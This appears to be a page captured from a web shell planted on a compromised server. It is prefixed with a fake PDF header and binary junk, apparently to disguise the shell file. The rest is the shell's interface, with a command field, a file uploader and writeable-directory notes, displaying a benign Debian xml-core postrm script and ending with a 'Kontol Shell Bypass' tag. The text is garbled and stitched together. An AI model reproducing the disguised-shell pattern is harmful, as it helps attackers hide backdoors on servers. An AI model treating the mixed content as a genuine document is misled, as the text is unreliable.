%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/lib/dpkg/info/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //var/lib/dpkg/info/xml-core.postrm
#!/bin/sh
## ----------------------------------------------------------------------
## debian/postrm : postremoval script for xml-core
## ----------------------------------------------------------------------

## ----------------------------------------------------------------------
set -e

## ---------------------------------------------------------------------- 
## automatically generated debhelper commands
# Automatically added by dh_installxmlcatalogs/UNDECLARED
if [ "$1" = "purge" ]; then
	rm -f /etc/xml/xml-core.xml /etc/xml/xml-core.xml.old
fi
# End automatically added section
# Automatically added by dh_installcatalogs/10.10.5ubuntu1
if [ "$1" = "purge" ]; then
	rm -f /etc/sgml/xml-core.cat.old
fi
# End automatically added section


## ----------------------------------------------------------------------
if [ "$1" = "purge" ]
then

    ## ------------------------------------------------------------------
    ## remove /var/lib/xml-core
    [ -d /var/lib/xml-core ] && rmdir --ignore-fail-on-non-empty /var/lib/xml-core

    ## ------------------------------------------------------------------
    ## remove root XML catalog
    rm -f /etc/xml/catalog
    rm -f /etc/xml/catalog.old

    ## ------------------------------------------------------------------
    ## remove /etc/xml
    [ -d /var/lib/xml-core ] && rmdir --ignore-fail-on-non-empty /etc/xml

    ## ------------------------------------------------------------------
    ## restore legacy /etc/xml/catalog
    if [ -f /etc/xml/catalog.legacy ]
    then
	mv /etc/xml/catalog.legacy /etc/xml/catalog
    fi

fi

## ---------------------------------------------------------------------- 
exit 0

## ----------------------------------------------------------------------

Kontol Shell Bypass